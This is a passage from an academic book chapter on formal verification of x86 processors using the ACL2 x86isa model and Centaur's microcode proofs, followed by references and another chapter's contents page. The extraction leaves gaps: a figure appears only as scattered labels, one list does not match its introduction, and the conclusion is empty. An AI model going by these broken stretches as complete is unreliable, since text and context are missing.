possible is a beneficial exercise, and optimizing the specification functions for
execution efficiency can make this a practical one. However, as we discussed
earlier, supporting execution efficiency often comes at the expense of simplicity
and reasoning efficiency. The following solution to this issue will be familiar
by now: we can use ACL2 to prove that specification functions optimized for
reasoning efficiency implement the same behavior as those optimized for execution
efficiency, and thus, they can be used interchangeably. We simply use whichever
definition is suitable, depending on the context. As discussed in Section “ACL2
Preliminaries”, ACL2 provides many features that help in balancing this trade-
off between reasoning and execution efficiency in a practical manner; x86isa
heavily relies on features like MBE, guards, and stobjs.(We actually use an abstract
stobj in x86isa to model the machine state. Abstract stobjs are an advanced
ACL2 feature that use regular stobjs for concrete execution but allow an alternative
definition (proven to correspond to the underlying stobj whose logical definition
involves lists) to be used for reasoning.) To sum up, model validation can be effort-
intensive–it can not only involve simulation but also theorem proving, both of which
place inherently opposing demands on the model’s design. However, validation
is indispensable because it serves as evidence for the model’s accuracy, thereby
increasing confidence in the results of formal verification. This encourages adoption
of the formal model by people other than its developers.
Unified Model for Simulation and Formal Verification: The x86isa model
is accompanied by some tools that support its use as a simulator; these tools are
especially useful for model validation via concrete simulations. Dynamic program
instrumentation utilities allow monitoring the behavior of a running program in
a manner similar to the GNU Debugger and Intel’s Pin tool (Patil et al. 2004;
Intel). For instance, one can step through a program one instruction at a time,
conditionally or unconditionally trace reads from and writes to the machine state,
insert breakpoints, log (requested parts of) the machine state to a file, and so on. One
can even modify the program during its execution. We also have a binary program
(ELF and Mach-O formats) loader library (EXLD 2022) in ACL2 that can parse an
executable program file and load requested sections of it into the relevant addresses
of the x86isa’s memory. This speeds up machine state initialization, which is the
first step toward simulating a program on the model. This library also makes symbol
table information available directly in ACL2, which, among other things, allows a
user to instrument a machine code program by referring to subroutine names used
in the source code instead of memory addresses that can change the next time the
binary file is generated. The x86isa model is also accompanied by lemma libraries
that support symbolic simulation. These lemmas are organized in collections to
support various proof strategies that target different kinds of verification problems.
37 Microprocessor Assurance and the Role of Theorem Proving 1349
For instance, there are separate libraries that describe the interaction of reads and
writes at the level of both physical and virtual memory. Note that all of these utilities
for simulation and verification are written in ACL2 itself. An important advantage
of writing such utilities in the same language as the formal specification is that one
avoids any potential language-related cognitive dissonance issues that could cause
unpredictable behavior that is difficult to debug.
Extensible Design: The x86 ISA is extended quite regularly. For instance, Intel
maintains a document (Intel Corporation 2021) that describes features slated to be
present in future x86 processors. The formal model must be able to keep up with this
ever-expanding ISA design; adding a new feature must not incur an unreasonable
manual overhead. In order to facilitate that, formal models must embrace the
extensible design principle of software engineering. One way the x86isa model
follows this principle is in its description of x86 instructions. The model contains a
list, inst.lst, of all the instructions supported (or soon-to-be supported) by x86
processors. Each element of inst.lst is essentially a structure of product type
that describes an instruction’s encoding and lists the name of the ACL2 function
that captures its semantics. Some fields of this structure are as follows:
1. Writing and testing the semantic function that captures that instruction’s behavior
2. Adding an appropriate instruction encoding entry, including the name of the
above function, in inst.lst
Scope
The x86isa library does not model the entirety of the x86 ISA. As of this writing,
only IA-32e and compatibility modes of operation are modeled in x86isa. Also,
1350 S. Goel and S. Ray
it describes a single x86 core, and its memory model is sequentially consistent; as
such, x86isa cannot be used to analyze concurrent behaviors. It does not model
caches, translation look-aside buffers, exceptions and interrupts, and features like
power management, virtual machine (VMX), and software guard extensions (SGX).
Despite these limitations, x86isa can still be used to perform a variety of useful
analyses. For instance, x86isa can be used to do software verification–i.e., to
establish the correctness of x86 machine-code programs w.r.t. a specification; an
interested reader can refer to examples in this work (Goel 2016). The x86isa
library has also been used at Centaur Technology to establish that the logic design-
ers’ Verilog/SystemVerilog implementation for instruction decoding has the same
behavior as that of the x86isa’s decoder; more details are in Section “Application:
Verifying x86 Instruction Implementations”.
It should be noted that such missing features in x86isa are not due to
some theoretical restrictions, but due to a lack of time and other such practical
considerations. We typically support an ISA feature only when we undertake a
verification project that requires a model of that feature.
– decode block: This block decodes bytes in the instruction stream in order to
identify the x86 instruction. It is also responsible for detecting illegally encoded
instructions and identifying the appropriate exceptions to be raised. For example,
if an instruction is more than 15 bytes in length (the maximum allowed by the
x86 ISA), then the decode block prescribes the #GP (general-purpose, interrupt
13) exception.
– xlate and ucode blocks: These blocks are responsible for the translation of a legal
x86 instruction, obtained from the decode block, into micro-operations or uops.
The xlate block translates an instruction to at most 6 prelude uops. There can also
be an optional trap to a microcode ROM in the ucode block. The ROM contains
a compressed version of the uops–also called ROM instructions–and these pass
through a sub-block called the microsequencer that translates a ROM instruction
into corresponding uops. All the uops, from xlate and ucode, that correspond to
a legal x86 instruction are collectively referred to as the ucode program.
37 Microprocessor Assurance and the Role of Theorem Proving 1351
– exec block: The exec block has the RTL implementations of uops. This block
may contain many different units–the ALU, for integer uops; the FPU, for
floating-point uops, etc.
ACL2 inst.lst
x86-decode x86-exec
x86isa Model
xlate/ucode-correct
decode- Ucode
d Model ucode-exec
correct
exec-correct
sv-xlate
sv-decode sv-exec
sv-ucode
SV Functions
ACL2/VL/SV
xlate scheduler,
decode exec
ucode load/store
RTL (in SystemVerilog)
and sv-exec ACL2 functions correspond to the decode, xlate, ucode, and exec
blocks, respectively. We note that VL and SV are trusted; i.e., we assume that these
tools have been implemented correctly.
Open-source ACL2 library GL (Swords 2010; Swords and Davis 2011) is used
for symbolic simulation. GL contains a prover that can verify ACL2 theorems
involving finite domains (e.g., bit-vectors of a particular width). This prover is
also verified in ACL2. GL symbolically simulates ACL2 function definitions to
reduce finite ACL2 theorems into propositional logic formulas. These propositional
logic formulas are then either proven using binary decision diagrams (BDDs) or
simplified using And-Inverter Graph (AIG) algorithms and sent to a SAT solver.
GL’s successor FGL (Swords 2020) can also be used for symbolic simulation–
FGL contains a sophisticated prover that can verify more general theorems than
GL because it incorporates term rewriting alongside bit-blasting using SAT solvers.
Ucode Model
Similar to how the x86isa model formally specifies the x86 instruction set
architecture, the ucode model formally specifies the microarchitecture. This model
is also defined by an interpreter that acts on the ucode state–the effects of each uop
are captured by the effects produced on the state by uop semantic functions. The
ucode state can be thought of as extending the x86isa state; it not only captures
the ISA state components but also the internal microarchitecture-specific registers,
flags, and memory banks.
The definition of the program counter in the ucode model deserves special
mention. Recall that the program counter of x86isa is simply the rip register;
it contains the address of the x86 instruction that the model is poised to execute.
Analogously, the program counter in the ucode model is a data structure that consists
of the prelude uops and, if applicable, an address in the microcode ROM–thus, the
program counter essentially contains a ucode program that corresponds to the x86
instruction that the ucode model is poised to execute. A uop is represented by a
product-type consisting of all the information needed to identify the uop–the uop’s
opcode, source and destination locations, immediate data, and so on. The value of
this program counter can be obtained by simulating the sv-xlate design function;
given a description of the x86 instruction, this function generate uops and, if needed,
a ROM trap address. More details are in Section “Verification of the Xlate/Ucode
Blocks”.
The ucode model begins execution by reading the first element in the program
counter. If it is a prelude uop, then its corresponding uop semantic function is
executed, after which that uop is removed from the program counter. Thus, unless
there are traps to the microcode ROM, the ucode model halts execution when there
are no uops left in the program counter. When a trap is present, the microcode ROM
is read to obtain the ROM instruction at that address, and then, the microsequencer
block is simulated, via the sv-ucode design functions, to get the corresponding
uops, which are then executed by calling their respective uop semantic functions, as
with prelude uops. A terminal ROM instruction (i.e., the last ROM instruction in a
37 Microprocessor Assurance and the Role of Theorem Proving 1353
ucode program) is tagged with a .T label, which signals to the ucode model that the
x86 instruction has run to completion and it then halts execution.
The uop semantic functions used in the ucode model are used to verify the
uop’s RTL implementations in the exec block–i.e., exec-correct theorem; this
is discussed in Section “Verification of the exec Block”. These functions are also
used in the proof of the xlate/ucode-correct–see Section “Verification of
the Xlate/Ucode Blocks”.
A Candidate Instruction
The first step involved in verifying an x86 instruction implementation is to pick the
instruction. This may sound obvious, but it is not a straightforward proposition. For
instance, using the mnemonic to identify a candidate instruction can be problematic–
the x86 ISA often has multiple variants for an instruction with the same mnemonic.
For example, the double-shift instruction SHRD corresponds to the variants listed
in Table 1; note that there are two separate opcodes, each of which describes six
distinct variants. Moreover, many instruction byte sequences can correspond to a
single variant–for instance, rex and operand-size override prefixes are ignored in
an instruction executing a byte operation; the instruction variants with and without
these prefixes are operationally the same.(We assume that these variants are of legal
length; specifically, adding these prefixes did not increase the length of the x86
instruction beyond the legal limit.) Additionally, there are multiple configuration
settings, like the operating mode of the processor, to take into account for each
variant.
The RTL implementation is a big factor in deciding how these variants are picked
for verification. For the decode block, the proof of correctness of all the variants
which have the same opcode is usually clubbed together. One may do additional
case-splits based on some RTL-specific internal parameters. For the xlate/ucode
blocks, a variant becomes a “stand-alone” verification target if it has exactly one
ucode program corresponding to it. For example, if SHRD r16, r16, imm8
and SHRD r32, r32, imm8 are implemented by the same sequence of uops,
then they are considered to be the same variant for the purposes of verifying these
blocks. An advantage of this choice over, say, clubbing all the possible instruction
variants together is that the microcode program under verification will have only
data-driven control paths (e.g., an early exit if imm8 is zero) instead of control
paths dictated by a specific variant (e.g., jump to another block of uops for variant A
and yet another block for variant B, and so on.). This means that there will be fewer
case-splits during a proof, which not only speeds up verification but also makes it
more amenable to automation using techniques like bit-blasting.
We will illustrate our verification approach for the decode, xlate, and ucode
blocks by using a running example of the following SHRD variant. This instruction’s
destination and source are 64-bit registers whose indices are represented by
<dreg64> and <sreg64>; it also takes an immediate byte <imm8> to specify
the shift amount.
variant: SHRD <dreg64>, <sreg64>, <imm8>
bytes: 0x48 0x0F 0xAC 0b11<dreg64><sreg64> <imm8>
The byte 0x48 is the rex prefix, which indicates that this is a 64-bit operation. The
bytes 0x0F 0xAC represent the opcode. The byte 0b11<dreg64><sreg64>
represents the ModR/M, whose mod field is 0b11, which indicates that the r/m
field denotes a register operand. The r/m field is a 3-bit value <dreg64>, and the
reg field is a 3-bit value <sreg64>.
Our ACL2 specification function shrd-spec (from the x86isa model)
describes the behavior of this instruction. The semantics of this instruction variant
are as follows: the destination is shifted right by a value indicated by the given
immediate byte (masked by 0x3F) and the resulting empty bit positions are filled
with bits shifted in from the source (least-significant bit first). Though SHRD can
also affect the rflags register, we omit all flag-related discussions here.
Figure 7 shows an example of a concrete run of this instruction variant, and
Tables 2 and 3 show the corresponding uops that implement this variant, along with
a log of the computation performed by each uop for this particular concrete run.
— Initial Values —
RDX := 0x1122 3344 5566 7788 RCX := 0x0123 4567 89AB CDEF
— Final Values —
RDX := 0x1122 3344 5566 7788 RCX := 0x7788 0123 4567 89AB
Fig. 7 An example of a concrete run of SHRD RCX, RDX, 16: the destination register RCX is
shifted right by 16 and the low 16 bits of RDX are shifted in from the left. RDX remains unchanged
37 Microprocessor Assurance and the Role of Theorem Proving 1355
that can then be input to sv-decode to obtain the valid-instruction data structure.
For instance, the following indicates the relevant variant of the SHRD instruction of
our running example:
Mnemonic: SHRD Opcode: 0x0F_AC
Variant: Size := 64; OP1 := GPR
Mode: 64-bit mode
Symbolic: OP1, OP2, OP3
The first line is used to find the appropriate entry for SHRD in inst.lst,
which gives information about the arity and kinds of operands of this instruction.
The second line helps in picking the variant under verification by specifying the
operation width, 64, and by constraining the first operand to be a register (i.e.,
not a memory location). The third line picks the machine configuration, and the
fourth line instructs the framework to pick a symbolic value for the operands–the
register indices and the immediate byte. All of this information is used to populate
the instruction data structure.
This structure is then passed through sv-xlate and sv-ucode, and thus, one
obtains the ucode program which comprises the prelude uops (i.e., uops generated
by xlate) and the address of the ucode routine, if applicable. One can then attempt
to prove that all relevant executions of this ucode program implement the SHRD
instruction. That is, the effects produced by the instruction specification function
shrd-spec on the ISA-visible components of the ucode state are the same as
those produced by the implementation (i.e., uops’ execution), provided that the
arguments of shrd-spec correspond to the instruction’s operands. These kinds
of proofs can be done by techniques like the the clock function approach, step-
wise invariant method (Boyer and Moore 1996; Ray and Moore 2004; Ray et al.
2008), and decompilation-into-logic (Myreen et al. 2008; ACL2 Books: Codewalker
2014), all of which could employ either GL /SAT’s automatic bit-blasting or ACL2
rewriting. The central idea is the symbolic simulation of these uops on our ucode
model.
Note that being able to obtain the prelude uops and the trap address automatically
allows one to keep up with the constantly changing RTL. For nonmajor “everyday”
changes in the RTL (e.g., if the ROM addresses change or if the uops use different
internal registers), the proofs usually work without any intervention.
Discussion
The goals of this project are to verify the decode, translate, microsequencer,
and execution blocks. This project does not take load/store units, caches, register
mapping, scheduler, etc., into account, and, as such, offers no guarantees there. A
benefit of this approach is that it enables a divide-and-conquer strategy for verifying
instruction implementations. The verification of the decode block, the xlate/ucode
blocks, and the exec blocks can all be done independently of each other. Indeed, the
verification of the exec block has been done at Centaur regularly for over a decade,
and this project incorporated and extended all that work. Another benefit is that one
does not need to formally specify (or even understand) the xlate and ucode blocks–
one can simply symbolically simulate these units and reason about their outputs
1358 S. Goel and S. Ray
(i.e., uops). This lends robustness to the process–design changes to those blocks
(apart from interface changes) do not impede formal verification.
Our focus in this chapter has been on architecture and microarchitecture assurance.
Of course, the scope of theorem proving goes far beyond that. A treatment of the
role of theorem proving in assurance of computing systems would be incomplete
without at least a passing mention of some of these topics.
Conclusion
References
Aagaard M, Cook B, Day N, Jones RB (2001) A framework for microprocessor correctness
statements. In: Margaria T, Melham TF (eds) Proceedings of the 11th International Conference
on Correct Hardware Design and Verification Methods (CHARME 2001). LNCS, vol 2144.
Springer, Scotland, pp 443–448
Aagard MD, Jones RB, Kaivola R, Kohatsu KR, Seger CH (2000) Formal verification of iterative
algorithms in microprocessors. In: Proceedings of the 37th ACM/IEEE Design Automation
Conference (DAC 2000). ACM Press, Los Angeles, pp 201–206
ACL2 Books: Codewalker. Online; accessed: Feb 2022. Github, (2014) https://github.com/acl2/
acl2/tree/master/books/projects/codewalker
Arm ISA Specifications. Online. https://developer.arm.com/architectures/cpu-architecture/a-
profile/exploration-tools
Armstrong A, Bauereiss T, Campbell B, Reid A, Gray KE, Norton RM, Mundkur P, Wassell M,
French J, Pulte C, Flur S, Stark I, Krishnaswami N, Sewell P (2019) Isa semantics for armv8-a,
risc-v, and cheri-mips. Proc ACM Program Lang 3. pp 1–31, https://doi.org/10.1145/3290384
Bauereiss T, Campbell B, Sewell T, Armstrong A, Esswood L, Stark I, Barnes G, Watson
RNM, Sewell P (2021) Verified security for the morello capability-enhanced prototype arm
architecture. Technical Report UCAM-CL-TR-959, University of Cambridge, Computer
Laboratory
Bevier WR, Hunt WA Jr, Moore JS, Young WD (1989) Special issue on system verification. J
Autom Reason 5(4):409–530
Boyer RS, Kaufmann M, Moore JS (1995) The Boyer-Moore theorem prover and its interactive
enhancements. Comput Math Appl 29(2):27–62
Boyer RS, Moore JS (1996) Mechanized formal reasoning about programs and computing
machines. Automated reasoning and its applications: essays in honor of larry wos, pp 147–
176 . https://www.cs.utexas.edu/users/boyer/bm96.pdf
Boyer RS, Moore JS (2002) Single-threaded objects in ACL2. In: Krishnamurthy S, Ramakrishnan
CR (eds) Practical Aspects of Declarative Languages (PADL). LNCS, vol 2257. Springer,
pp 9–27
Boyer RS, Yu Y (1996) Automated proofs of object code for a widely used microprocessor. J
ACM 43(1):166–192. http://dl.acm.org/citation.cfm?id=227603
Bronstein A, Talcott TL (1990) Formal verification of pipelines based on string-functional
semantics. In: Claesen LJM (ed) Formal VLSI correctness verification. VLSI design methods
II, pp 349–366
Burch JR, Dill DL (1994) Automatic verification of pipelined microprocessor control. In: Dill DL
(ed) Proceedings of the 6th International Conference on Computer-Aided Verification (CAV
1994). LNCS, vol 818. Springer, pp 68–80
Chen YA, Bryant RE (1998) Verification of floating-point adders. In: International Conference on
Computer Aided Verification. Springer, pp 488–499
Church A, Kleene SC (1937) Formal definitions in the theory of ordinal numbers. Fundam Math
28:11–21
CLHS (Common Lisp HyperSpec) Online; accessed: 2022 http://www.lispworks.com/reference/
HyperSpec/index.html
Davis J, Slobodova A, Swords S (2014) Microcode verification–another piece of the microproces-
sor verification puzzle. In: International Conference on Interactive Theorem Proving. Springer,
pp 1–16
Degenbaev U (2012) Formal specification of the x86 instruction set architecture. Ph.D. thesis,
Universität des Saarlandes. http://rg-master.cs.uni-sb.de/publikationen/UD11.pdf
Dowek G, Felty A, Huet G, Paulin C, Werner B (1991) The coq proof assistant user guide version
5.6. Technical Report TR 134, INRIA
1360 S. Goel and S. Ray
EXLD: ELF and Mach-O File Parser, Documentation. Online; accessed: 2022. https://www.cs.
utexas.edu/users/moore/acl2/manuals/current/manual/?topic=EXLD____EXECLOADER
Floyd R (1967) Assigning meanings to programs. In: Mathematical Aspects of Computer Science,
Proceedings of Symposia in Applied Mathematcs, vol XIX. American Mathematical Society,
Providence, pp 19–32
Fox A (2015) Improved tool support for machine-code decompilation in HOL4. In: International
Conference on Interactive Theorem Proving. Springer, pp 187–202
Goel S (2016) Formal verification of application and system programs based on a validated x86
ISA model. Ph.D. thesis, Department of Computer Science, The University of Texas at Austin.
https://repositories.lib.utexas.edu/handle/2152/46437
Goel S, Slobodova A, Sumners R, Swords S (2020) Verifying x86 instruction implementations.
In: Proceedings of the 9th ACM SIGPLAN International Conference on Certified Programs and
Proofs, CPP 2020. Association for Computing Machinery, New York, pp 47–60. https://doi.org/
10.1145/3372885.3373811
Goel S, Slobodova A, Sumners R, Swords S (2021) Balancing automation and control for formal
verification of microprocessors. In: Silva A, Leino KRM (eds) Computer Aided Verification.
Springer International Publishing, Cham pp 26–45
Goel S, Sumners R (2019) Using x86isa for microcode verification. In: SpISA 2021: Workshop
on Instruction Set Architecture Specification. https://www.cl.cam.ac.uk/~jrh13/spisa19/paper_
08.pdf
Goldstein HH, von Neumann J (1961) Planning and coding problems for an electronic computing
instrument. In: von Neumann J (ed) Collected Works, vol V. Pergamon Press, Oxford
Gordon MJC, Melham TF (eds) (1993) Introduction to HOL: a theorem-proving environment for
higher-order logic. Cambridge University Press, ISBN 0-521-44189-7. Journal of Functional
Programming, 4(4), pp 557–559. https://doi.org/10.1017/S0956796800001180
Graf S, Saidi H (1997) Construction of abstract state graphs with PVS. In: Grumberg O (ed)
Proceedings of the 9th International Conference on Computer-Aided Verification (CAV 1997).
LNCS, vol 1254. Springer, pp 72–83
Greve D, Wilding M, Hardin D (2000) High-speed, analyzable simulators. In: Kaufmann M,
Manolios P, Moore JS (eds) Computer-aided reasoning: ACL2 case studies, Kluwer Academic
Publishers, Boston, pp 89–106
Greve DA (1998) Symbolic simulation of the JEM1 microprocessor. In: Gopalakrishnan G,
Windley P (eds) Formal methods in computer-aided design. Lecture notes in computer science,
vol 1522. Springer, Berlin/Heidelberg, pp 321–333. https://doi.org/10.1007/3-540-49519-3_21
Greve DA, Kaufmann M, Manolios P, Moore JS, Ray S, Ruize-Reina JL, Sumners R, Vroon D,
Wilding M (2008) Efficient execution in an automated reasoning environment. J Funct Program
18(1):15–46
Harrison J (1999) A machine-checked theory of floating point arithmetic. In: International
Conference on Theorem Proving in Higher Order Logics. Springer, pp 113–130
He J, Hoare CAR, Fränzle M, Müller-Olm M, Olderog ER, Schenke M, Hansen MR, Ravn AP,
Rischel H (1994) Provably correct systems. In: International Symposium on Formal Techniques
in Real-Time and Fault-Tolerant Systems. Springer, pp 288–335
Hunt WA Jr (1989)Microprocessor design verification. J Autom Reason 5(4):429–460. http://www.
cs.utexas.edu/~boyer/ftp/cli-reports/048.pdf
Hunt WA Jr (1994) FM8501: a verified microprocessor. LNAI, vol 795. Lecture Notes in Artificial
Intelligence, Springer, ISBN: 9783540579601
Intel: Pin: A Dynamic Binary Instrumentation Tool. http://software.intel.com/en-us/articles/pin-a-
dynamic-binary-instrumentation-tool
Intel Corporation (2021) Intel® Architecture Instruction Set Extensions Programming Reference.
Online. Order Number: 319433-044. https://software.intel.com/en-us/articles/intel-sdm
Intel Corporation (2020) Intel® 64 and IA-32 Architectures Software Developer’s Manual
Combined Volumes: 1, 2A, 2B, 2C, 2D, 3A, 3B, 3C, 3D, and 4. Online. Order Number:
325462-072USs. https://software.intel.com/en-us/articles/intel-sdm
37 Microprocessor Assurance and the Role of Theorem Proving 1361
Kaivola R, Kohatsu K (2003) Proof engineering in the large: formal verification of Pentiumő 4
floating-point divider. Int J Softw Tools Technol Transfer 4(3):323–334
Kaivola R, Narasimhan N (2001) Formal verification of the Pentiumő 4 multiplier. In: Sixth IEEE
International High-Level Design Validation and Test Workshop, pp 115–120. https://doiu.org/
10.1109/HLDVT.2001.972817
Kaufmann D, Biere A, Kauers M (2019) Verifying large multipliers by combining sat and computer
algebra. In: 2019 Formal Methods in Computer Aided Design (FMCAD). IEEE, pp 28–36
Kaufmann M, Manolios P, Moore JS (eds) (2000a) Computer-aided reasoning: ACL2 case studies.
Kluwer Academic Publishers, Boston
Kaufmann M, Manolios P, Moore JS (2000b) Computer-aided reasoning: an approach. Kluwer
Academic Publishers, Boston
Kaufmann M, Moore JS (1994) Design goals of ACL2. Technical Report 101, Computational
Logic Incorporated (CLI), Austin
Kaufmann M, Moore JS (1997) A precise description of the acl2 logic. See https://www.cs.utexas.
edu/users/moore/publications/km97a.pdf
Lahiri SK, Bryant RE, Cook B (2003) A symbolic approach to predicate abstraction. In: Hunt
WA Jr, Somenzi F (eds) Proceedings of the 15th International Conference on Computer-Aided
Verification. LNCS, vol 2275. Springer, pp 141–153
Leroy X (2006)Formal certification of a compiler back-end, or: programming a compiler with
a proof assistant. In: Proceedings of the 33rd Symposium on Principles of Programming
Languages (POPL 2006). ACM Press, pp 42–54
Levy HM (1984) Capability-based computer systems. Butterworth-Heinemann, Newton
Liu H, Moore JS (2004) Java program verification via a JVM deep embedding in ACL2. In:
International Conference on Theorem Proving in Higher Order Logics. Springer, pp 184–200
Manolios P (2000) Correctness of pipelined machines. In: Hunt WA Jr, Johnson SD (eds)
Proceedings of the 3rd International Conference on Formal Methods in Computer-Aided Design
(FMCAD 2000), LNCS, vol 1954. Springer, Austin, pp 161–178
Manolios P, Vroon D (2003) Algorithms for ordinal arithmetic. In: Baader F (ed) Proceedings
of the 19th International Conference on Automated Deduction (CADE 2003). LNAI, vol 2741.
Springer, Miami, pp 243–257
Moore JS (1996) Piton: a mechanically verified assembly-level language. Automated reasoning
series, Kluwer Academic Publishers, USA
Moore JS (2003) Proving theorems about Java and the JVM with ACL2. In: Broy M, Pizka M
(eds) Models, algebras, and logic of engineering software. IOS Press, pp 227–290
Moore JS, Lynch T, Kaufmann M (1998) A mechanically checked proof of the kernel of the
AMD5K86 floating-point division algorithm. IEEE Trans Comput 47(9):913–926
Moore JS, Porter G (2002) The apprentice challenge. ACM Trans Program Lang Syst (ACM
TOPLAS) 24(3):1–24
Mukherjee R, Joshi S, Griesmayer A, Kroening D, Melham T (2016) Equivalence checking of
a floating-point unit against a high-level c model. In: Fitzgerald J, Heitmeyer C, Gnesi S,
Philippou A (eds) FM 2016: Formal Methods. Springer International Publishing, Cham, pp 551–
558
Mukherjee R, Kroening D, Melham T, Srivas M (2015) Equivalence checking using trace
partitioning. In: 2015 IEEE Computer Society Annual Symposium on VLSI, pp 13–18. https://
doi.org/10.1109/ISVLSI.2015.110
Myreen MO, Gordon M, Slind K (2008) Machine-code verification for multiple architectures –
An application of decompilation into logic. In: Formal methods in computer-aided design,
2008. FMCAD’08, pp 1–8. https://doi.org/10.1109/FMCAD.2008.ECP.24, http://www.cl.cam.
ac.uk/~mom22/decomp.pdf
Nipkow T, Paulson LC, Wenzel M (2002) Isabelle/HOL: a proof assistant for higher-order logic,
vol 2283. Springer Science & Business Media, Lecture Notes in Computer Science, Springer
Berlin. https://doi.org/10.1007/3-540-45949-9
1362 S. Goel and S. Ray
O’Leary J, Kaivola R, Melham T (2013) Relational ste and theorem proving for formal verification
of industrial circuit designs. In: 2013 Formal Methods in Computer-Aided Design. IEEE,
pp 97–104
Owre S, Rushby JM, Shankar N (1992) PVS: a prototype verification system. In: Kapur D (ed)
11th International Conference on Automated Deduction (CADE). Lecture notes in artificial
intelligence, vol 607. Springer, Saratoga, pp 748–752
Patil H, Cohn R, Charney M, Kapoor R, Sun A, Karunanidhi A (2004) Pinpointing representative
portions of large intel ő itanium ő programs with dynamic instrumentation. In: 37th International
Symposium on Microarchitecture (MICRO-37’04), pp 81–92. https://doi.org/10.1109/MICRO.
2004.28
Paulson L (1993) Set theory for verification: I. From foundations to functions. J Autom Reason
11:353–389
Paulson L (1995) Set theory for verification: II. Induction and recursion. J Autom Reason
15:167–215
Pouarz TW, Agrawal V (2016) Efficient and exhaustive floating point verification using sequential
equivalence checking. DVCon
Pratt VR (1995) Anatomy of the pentium bug. In: Proceedings of the 6th International Joint
Conference CAAP/FASE on Theory and Practice of Software Development, TAPSOFT’95.
Springer, Berlin/Heidelberg, pp 97–107
Ray S, Bhadra J (2007) A mechanized refinement framework for analysis of custom memories.
In: Baumgartner J, Sheeran M (eds) Proceedings of the 7th International Conference on
Formal Methods in Computer-Aided Design (FMCAD 2007). IEEE Computer Society, Austin,
pp 239–242
Ray S. Bhadra J, Portlock T, Syzdek R (2010)Modeling and verification of industrial flash
memories. In: Inernational Symposium on Quality Electronic Designs
Ray S, Hunt WA Jr, Matthews J, Moore JS (2008) A mechanical analysis of program verification
strategies. J Autom Reason 40(4):245–269
Ray S, Moore JS (2004) Proof styles in operational semantics. In: Hu AJ, Martin AK (eds)
Proceedings of the 5th International Conference on Formal Methods in Computer-Aided Design
(FMCAD 2004). LNCS, vol 3312. Springer, Austin, pp 67–81
Ray S, Sumners R (2007) Combining theorem proving with model checking through predicate
abstraction. IEEE Des Test Comput 24(2):132–139
Ray S, Sumners R (2013) Specification and verification of concurrent programs through refine-
ments. J Autom Reason 51(3):241–280
Reid A (2016) Trustworthy specifications of ARM v8-A and v8-M system level architecture.
In: Proceedings of the 16th Conference on Formal Methods in Computer-Aided Design
(FMCAD’16)
Reid A, Chen R, Deligiannis A, Gilday D, Hoyes D, Keen W, Pathirane A, Shepherd O, Vrabel
P, Zaidi A (2016) End-to-end verification of processors with ISA-formal. In: International
Conference on Computer Aided Verification. Springer, pp 42–58
Russinoff D (1992) A mechanical proof of quadratic reciprocity. J Autom Reason 8:3–21
Russinoff D (1994) A mechanically verified incremental garbage collector. Form Asp Comput
6:359–390
Russinoff D (1998) A mechanically checked proof of IEEE compliance of a register-transfer-
level specification of the AMD-K7 floating-point multiplication, division, and square root
instructions. LMS J Comput Math 1:148–200
Russinoff DM (2000) A case study in formal verification of register-transfer logic with acl2: The
floating point adder of the amd athlon tm processor. In: International Conference on Formal
Methods in Computer-Aided Design. Springer, pp 22–55
Russinoff DM (2018) Formal verification of floating-point hardware design: a mathematical
approach. Springer, Springer International Publishing, ISBN: 9783319955131
Saidi H, Shankar N (1999) Abstract and model check while you prove. In: Halbwacha N, Peled D
(eds) Proceedings of the 11th International Conference on Computer-Aided Verification (CAV
1999), LNCS, vol 1633. Springer, pp 443–453
37 Microprocessor Assurance and the Role of Theorem Proving 1363
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1366
Challenges of Classic Symbolic and Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1367
Overview of Versatile Binary-Level Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1367
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1368
Symbolic Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1368
Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1369
Related Works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1370
The Infrastructure of Versatile Binary-Level Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . 1371
Design and Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1372
Real-World Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1373
Concolic Testing on COTS Linux Kernel Modules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1375
Design and Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1376
Real-World Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1378
Concolic Testing for Hardware/Software Co-validation of Systems-on-Chips . . . . . . . . . . . 1380
Design and Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1380
Real-World Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1383
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1385
